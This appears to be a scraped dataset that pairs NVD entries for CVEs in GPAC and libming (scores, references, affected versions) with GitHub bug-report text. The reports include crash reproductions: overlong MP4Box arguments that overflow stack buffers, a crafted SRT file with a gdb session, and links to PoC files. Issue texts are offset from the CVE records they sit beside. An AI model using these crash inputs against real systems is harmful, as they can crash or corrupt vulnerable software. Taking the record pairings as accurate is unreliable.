OOB issue of gf_text_get_utf8_line
https://api.github.com/repos/gpac/gpac/issues/1177/comments
4
2018-12-13T10:41:00Z
2022-08-25T08:25:32Z
https://github.com/gpac/gpac/issues/1177
390,618,242
1,177
CVE-2018-20761
2019-02-06T23:29:00.293
GPAC version 0.7.1 and earlier has a Buffer Overflow vulnerability in the gf_sm_load_init function in scene_manager.c in libgpac_static.a.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/35ab4475a7df9b2a4bcab235e379c0c3ec543658" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1186" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00040.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/3926-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac_project:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4ED3B4A-F8B8-4E70-BDF7-811129A50B0F", "versionEndExcluding": null, "versionEndIncluding": "0.7.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1186
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
There is a buffer overflow issue in gf_sm_load_init () function, scene_manager.c GF_Err gf_sm_load_init(GF_SceneLoader *load) { …… ext = (char *)strrchr(load->fileName, '.'); if (!ext) return GF_NOT_SUPPORTED; if (!stricmp(ext, ".gz")) { char *anext; ext[0] = 0; anext = (char *)strrchr(load->fileName, '.'); ext[0] = '.'; ext = anext; } strcpy(szExt, &ext[1]); // buffer overflow here. …… } root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# ./MP4Box -inctx inScene.exttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt -out output.txt -add overview.srt overview.mp4 Timed Text (SRT) import - text track 580 x 436, font Serif (size 18) *** stack smashing detected ***: ./MP4Box terminated Aborted (core dumped)
buffer overflow issue 3#
https://api.github.com/repos/gpac/gpac/issues/1186/comments
3
2018-12-22T02:44:19Z
2022-08-25T08:33:41Z
https://github.com/gpac/gpac/issues/1186
393,636,374
1,186
CVE-2018-20762
2019-02-06T23:29:00.370
GPAC version 0.7.1 and earlier has a buffer overflow vulnerability in the cat_multiple_files function in applications/mp4box/fileimport.c when MP4Box is used for a local directory containing crafted filenames.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/35ab4475a7df9b2a4bcab235e379c0c3ec543658" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1187" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00040.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/3926-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac_project:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4ED3B4A-F8B8-4E70-BDF7-811129A50B0F", "versionEndExcluding": null, "versionEndIncluding": "0.7.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1187
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
There is a buffer overflow issue in cat_multiple_files () function, fileimport.c GF_Err cat_multiple_files(GF_ISOFile *dest, char *fileName, u32 import_flags, Double force_fps, u32 frames_per_sample, char *tmp_dir, Bool force_cat, Bool align_timelines, Bool allow_add_in_command) { …… if (sep) { strcpy(cat_enum.szOpt, sep); // buffer overflow here. sep[0] = 0; } …… } root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# ./MP4Box -cat cat*.txt:szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2szRad2 -add overview.srt overview.mp4 Timed Text (SRT) import - text track 580 x 436, font Serif (size 18) Segmentation fault (core dumped)
buffer overflow issue 4#
https://api.github.com/repos/gpac/gpac/issues/1187/comments
2
2018-12-22T02:47:42Z
2022-08-25T08:34:06Z
https://github.com/gpac/gpac/issues/1187
393,636,571
1,187
CVE-2018-20763
2019-02-06T23:29:00.417
In GPAC 0.7.1 and earlier, gf_text_get_utf8_line in media_tools/text_import.c in libgpac_static.a allows an out-of-bounds write because of missing szLineConv bounds checking.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/1c449a34fe0b50aaffb881bfb9d7c5ab0bb18cdd" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1188" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00040.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/3926-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac_project:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4ED3B4A-F8B8-4E70-BDF7-811129A50B0F", "versionEndExcluding": null, "versionEndIncluding": "0.7.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1188
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
There is a buffer overflow issue in gf_text_get_utf8_line () function, text_import.c in line 429 of gf_text_import_srt, parameter lineSize is 2048, but in gf_text_get_utf8_line (), the size of szLineConv is 1024, so, when the size of szLine is more than 1024, the buffer of szLineConv will overflow. 429 char *sOK = gf_text_get_utf8_line(szLine, 2048, srt_in, unicode_type); char *gf_text_get_utf8_line(char *szLine, u32 lineSize, FILE *txt_in, s32 unicode_type) { …… char szLineConv[1024]; …… len = (u32) strlen(szLine); // len might be more than 1024 for (i=0; i<len; i++) { if (!unicode_type && (szLine[i] & 0x80)) { /*non UTF8 (likely some win-CP)*/ if ((szLine[i+1] & 0xc0) != 0x80) { szLineConv[j] = 0xc0 | ( (szLine[i] >> 6) & 0x3 ); // j may more than 1024 here j++; szLine[i] &= 0xbf; } …… } root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# ./MP4Box -srt 0 crafted_text.srt Timed Text (SRT) import - text track 400 x 60, font Serif (size 18) *** stack smashing detected ***: ./MP4Box terminated Aborted (core dumped) root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.3) 7.7.1 Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ./MP4Box...done. (gdb) set args -srt 0 crafted_text.srt (gdb) b text_import.c:250 No source file named text_import.c. Make breakpoint pending on future shared library load? (y or [n]) y Breakpoint 1 (text_import.c:250) pending. (gdb) r Starting program: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box -srt 0 crafted_text.srt [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Timed Text (SRT) import - text track 400 x 60, font Serif (size 18) Breakpoint 1, gf_text_get_utf8_line (szLine=0x7fffffff88e0 "1\n", lineSize=2048, txt_in=0x65d570, unicode_type=0) at media_tools/text_import.c:250 250 szLineConv[j] = 0; (gdb) c Continuing. Breakpoint 1, gf_text_get_utf8_line (szLine=0x7fffffff88e0 "00:00:12,375 --> 00:00:13,425\n", lineSize=2048, txt_in=0x65d570, unicode_type=0) at media_tools/text_import.c:250 250 szLineConv[j] = 0; (gdb) c Continuing. Breakpoint 1, gf_text_get_utf8_line ( szLine=0x7fffffff88e0 "hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello wo"..., lineSize=2048, txt_in=0x65d570, unicode_type=0) at media_tools/text_import.c:250 250 szLineConv[j] = 0; (gdb) p j $1 = 1729 (gdb) c Continuing. *** stack smashing detected ***: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box terminated Program received signal SIGABRT, Aborted. 0x00007ffff72b7c37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) Guoxiang Niu, EaglEye Team
buffer overflow issue 5#
https://api.github.com/repos/gpac/gpac/issues/1188/comments
2
2018-12-22T03:05:37Z
2019-04-19T08:57:13Z
https://github.com/gpac/gpac/issues/1188
393,637,600
1,188
CVE-2019-7581
2019-02-07T18:29:00.193
The parseSWF_ACTIONRECORD function in util/parser.c in libming through 0.4.8 allows remote attackers to have unspecified impact via a crafted swf file that triggers a memory allocation failure, a different vulnerability than CVE-2018-7876.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/173" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:*:*:*:*:*:*:*:*", "matchCriteriaId": "47C3E495-3E11-4C91-B3B9-C479BF492011", "versionEndExcluding": null, "versionEndIncluding": "0.4.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04.4:*:*:*:lts:*:x64:*", "matchCriteriaId": "E048F636-E613-4278-9A11-1FCF7219B1FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
https://github.com/libming/libming/issues/173
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
version: master(**commit 50098023446a5412efcfbd40552821a8cba983a6**) command: **listswf $FILE** OS: **Ubuntu 16.04.4 LTS 64bit** ``` $ ./install-asan/bin/listswf poc>/dev/null header indicates a filesize of 808464488 but filesize is 430 Stream out of sync after parse of blocktype 24 (SWF_PROTECT). 33 but expecting 51. ==40038==WARNING: AddressSanitizer failed to allocate 0xfffffffffffcd800 bytes ==40038==AddressSanitizer's allocator is terminating the process instead of returning 0 ==40038==If you don't like this behavior set allocator_may_return_null=1 ==40038==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0x7f9ab5b8b631 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa0631) #1 0x7f9ab5b905e3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa55e3) #2 0x7f9ab5b08425 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x1d425) #3 0x7f9ab5b8e865 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa3865) #4 0x7f9ab5b0db4d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22b4d) #5 0x7f9ab5b835d2 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x985d2) #6 0x433465 in parseSWF_ACTIONRECORD /home/wdw/experiment/aflgo/libming/util/parser.c:1142 #7 0x42d6de in parseSWF_CLIPACTIONRECORD /home/wdw/experiment/aflgo/libming/util/parser.c:386 #8 0x42da81 in parseSWF_CLIPACTIONS /home/wdw/experiment/aflgo/libming/util/parser.c:408 #9 0x4443a3 in parseSWF_PLACEOBJECT2 /home/wdw/experiment/aflgo/libming/util/parser.c:2665 #10 0x419c15 in blockParse /home/wdw/experiment/aflgo/libming/util/blocktypes.c:145 #11 0x415a68 in readMovie /home/wdw/experiment/aflgo/libming/util/main.c:269 #12 0x41624e in main /home/wdw/experiment/aflgo/libming/util/main.c:354 #13 0x7f9ab522282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x401aa8 in _start (/home/wdw/experiment/aflgo/libming/install-asan/bin/listswf+0x401aa8) ``` Download: [poc](https://github.com/waugustus/poc/blob/master/libming/memory-allocate-failure_parser.c-1142)
Memory allocation failure in parseSWF_ACTIONRECORD (parser.c: 1142), different from #109
https://api.github.com/repos/libming/libming/issues/173/comments
2
2019-01-17T09:18:12Z
2019-03-09T02:21:40Z
https://github.com/libming/libming/issues/173
400,178,750
173
CVE-2019-7582
2019-02-07T18:29:00.240
The readBytes function in util/read.c in libming through 0.4.8 allows remote attackers to have unspecified impact via a crafted swf file that triggers a memory allocation failure.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/172" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:*:*:*:*:*:*:*:*", "matchCriteriaId": "47C3E495-3E11-4C91-B3B9-C479BF492011", "versionEndExcluding": null, "versionEndIncluding": "0.4.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04.4:*:*:*:lts:*:x64:*", "matchCriteriaId": "E048F636-E613-4278-9A11-1FCF7219B1FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
https://github.com/libming/libming/issues/172
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
version: master(**commit 50098023446a5412efcfbd40552821a8cba983a6**) command: **listswf $FILE** OS: **Ubuntu 16.04.4 LTS 64bit** ``` $ ./install-asan/bin/listswf poc >/dev/null header indicates a filesize of 1995 but filesize is 1916 ==19625==WARNING: AddressSanitizer failed to allocate 0xfffffffffffffffe bytes ==19625==AddressSanitizer's allocator is terminating the process instead of returning 0 ==19625==If you don't like this behavior set allocator_may_return_null=1 ==19625==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0x7f9290d80631 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa0631) #1 0x7f9290d855e3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa55e3) #2 0x7f9290cfd425 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x1d425) #3 0x7f9290d83865 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa3865) #4 0x7f9290d02b4d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22b4d) #5 0x7f9290d785d2 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x985d2) #6 0x44dec2 in readBytes /home/wdw/experiment/aflgo/libming/util/read.c:252 #7 0x437290 in parseSWF_DEFINEBITSJPEG2 /home/wdw/experiment/aflgo/libming/util/parser.c:1493 #8 0x419c15 in blockParse /home/wdw/experiment/aflgo/libming/util/blocktypes.c:145 #9 0x415a68 in readMovie /home/wdw/experiment/aflgo/libming/util/main.c:269 #10 0x41624e in main /home/wdw/experiment/aflgo/libming/util/main.c:354 #11 0x7f929041782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x401aa8 in _start (/home/wdw/experiment/aflgo/libming/install-asan/bin/listswf+0x401aa8) ``` Download: [poc](https://github.com/waugustus/poc/blob/master/libming/memory-allocate-failure_read.c-252)
Memory allocation failure in readBytes (read.c:252)
https://api.github.com/repos/libming/libming/issues/172/comments
2
2019-01-17T09:17:38Z
2019-03-09T02:21:54Z
https://github.com/libming/libming/issues/172
400,178,531
172
CVE-2019-7697
2019-02-10T22:29:00.327
An issue was discovered in Bento4 v1.5.1-627. There is an assertion failure in AP4_AtomListWriter::Action in Core/Ap4Atom.cpp, leading to a denial of service (program crash), as demonstrated by mp42hls.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/351" } ]
